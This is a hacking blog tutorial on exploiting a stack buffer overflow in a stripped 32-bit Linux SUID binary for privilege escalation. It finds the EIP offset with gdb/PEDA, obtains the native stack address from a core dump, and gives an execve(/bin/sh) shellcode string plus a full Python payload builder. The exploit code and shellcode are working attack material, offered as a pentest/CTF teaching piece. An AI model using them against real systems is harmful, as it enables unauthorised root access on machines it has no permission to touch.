Linux Buffer Overflow x86 with GDB

Hey hackers,

Today I am writing about how to exploit a basic stack-based buffer overflow in a 32-bit (x86) Linux binary using GDB.

Let’s get started ….


Tools required

  1. gdb with the PEDA plugin: https://github.com/longld/peda
  2. ltrace

Exploit

Let’s assume that we are doing a pentest or a CTF and have already got a foothold on the target machine. We then find a SUID binary that we want to use for privilege escalation, since exploiting a userland binary is less noisy than running a kernel exploit.

We start with an unknown file.

Running it under ltrace shows the library functions it calls, including the strcpy that we will target.

Run gdb and try to disassemble main.

We do not see main here, so the binary is probably stripped (no symbol table). We can still break on imported library functions such as strcpy, because those are resolved through the PLT and gdb knows their names.

Set a breakpoint on ‘strcpy’ and run the binary. When it stops, analyse the arguments passed to strcpy: the destination is a fixed-size stack buffer and the source is our input, with no length check.

Now pass input to the binary generated with PEDA’s pattern create: a cyclic pattern in which every four-byte window is unique, so whatever lands in EIP tells us exactly how far into the input the saved return address sits.

We get a segfault.

Let’s look for the pattern ‘wA%Z’, the four bytes that overwrote the return address. It is found at offset 390. (gdb prints registers as little-endian integers, so ‘wA%Z’ shows up in EIP as 0x5a254177; reverse the bytes to get the string.)

Now we have to find where our input starts on the stack.

From the stack dump we see that it starts at 0xffffd160 + 0x06 = 0xffffd166.

Now we need the same location for a run outside gdb, because stack addresses shift when the binary runs under gdb (gdb adds environment variables such as LINES and COLUMNS and disables ASLR by default).

The easiest way to get the native address is to crash the binary outside gdb and inspect the core dump. So we need to get a core dump.

# A SUID binary will not generate a core dump (the kernel marks it non-dumpable), so copy the binary (the copy loses the SUID bit) and raise the core-file limit with `ulimit -c unlimited` before crashing it.

Here, the python script exploit.py/shellcode.py just prints 390 A’s followed by 4 B’s. If EIP reads 0x42424242 at the crash, the offset of 390 is confirmed.

Let’s put the shellcode in the buffer and point the return address at 0xffffd210, inside our input on the stack.

For the shellcode, use the one given below. It contains no 0x00 bytes, which matters because strcpy stops copying at the first NUL.

`\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80` -> execve(/bin/sh)

Run the exploit.
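The whole procedure in one place, as an added Python example that is not the post’s exploit.py: it generates a cyclic pattern, recovers the offset from the value found in EIP, builds the 390 A’s + BBBB probe, and assembles the final payload (NOP sled, the shellcode above, and the return address 0xffffd210) while checking that it is NUL-free. The offset 390, the buffer start 0xffffd166 and the return address 0xffffd210 are the values the post found; the layout (sled and shellcode inside the 390-byte buffer, return address pointing into the sled) is an assumption about that binary. The pattern generator is Metasploit-style, not PEDA’s, so the offset it reports for a given four-byte value differs from what PEDA prints.

```python
#!/usr/bin/env python3
"""Payload builder for the stack overflow walked through above.

Added example; not the post's exploit.py. The offsets and addresses are the
ones the post found with PEDA, so they only apply to that binary and stack.
"""
import string
import struct
import sys

EIP_OFFSET = 390          # bytes of input before the saved return address (from the post)
BUF_START = 0xFFFFD166    # where our input begins on the stack (from the post)
RET_ADDR = 0xFFFFD210     # address we return into; must land inside the NOP sled

# execve("/bin/sh") shellcode from the post: 23 bytes, no 0x00 bytes
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80")
NOP = b"\x90"


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    for the first 20280 bytes. Same idea as PEDA's `pattern create`, but a
    different generator, so offsets for a given window are not the same."""
    parts = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                parts.append(u + l + d)
                if len(parts) * 3 >= length:
                    return "".join(parts)[:length].encode()
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def eip_to_text(eip):
    """gdb shows EIP as a little-endian integer; undo that to get the four
    pattern characters that overwrote the return address (0x5a254177 -> 'wA%Z')."""
    return struct.pack("<I", eip).decode("latin-1")


def pattern_offset(pattern, eip):
    """Offset of the crash value inside the pattern, i.e. the distance from
    the start of the input to the saved return address."""
    off = pattern.find(struct.pack("<I", eip))
    if off < 0:
        raise ValueError("EIP value 0x%08x is not in the pattern" % eip)
    return off


def offset_probe(offset=EIP_OFFSET):
    """The post's first exploit.py: offset bytes of 'A' then 'BBBB'. If EIP
    reads 0x42424242 at the crash, the offset is confirmed."""
    return b"A" * offset + b"B" * 4


def build_payload(offset=EIP_OFFSET, ret=RET_ADDR, shellcode=SHELLCODE):
    """[NOP sled][shellcode][return address]; sled + shellcode = offset bytes.

    The binary copies the input with strcpy, which stops at the first 0x00,
    so the whole payload must be NUL-free (0xffffd210 packs without a NUL)."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit in front of the return address")
    payload = NOP * (offset - len(shellcode)) + shellcode + struct.pack("<I", ret)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def ret_lands_in_sled(ret=RET_ADDR, buf_start=BUF_START,
                      offset=EIP_OFFSET, shellcode=SHELLCODE):
    """True if ret points into the NOP sled (not before the buffer and not
    into the shellcode). With the post's numbers: 0xffffd210 - 0xffffd166 =
    170, and the sled is 390 - 23 = 367 bytes long."""
    idx = ret - buf_start
    return 0 <= idx < offset - len(shellcode)


if __name__ == "__main__":
    if not ret_lands_in_sled():
        sys.exit("return address does not point into the NOP sled")
    # Raw bytes on stdout. How the binary takes input is assumed here:
    #   ./target "$(python3 exploit.py)"   if it reads argv
    #   python3 exploit.py | ./target      if it reads stdin
    sys.stdout.buffer.write(build_payload())
```

Keeping a sled in front of the shellcode is what makes the single address from the core dump usable: the native stack address only has to land somewhere in the 367 NOP bytes, not on the exact byte where the shellcode begins.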


Please give a clap if you found it to be useful and follow me to get more hacking knowledge.

Photo by Ricky Kharawala on Unsplash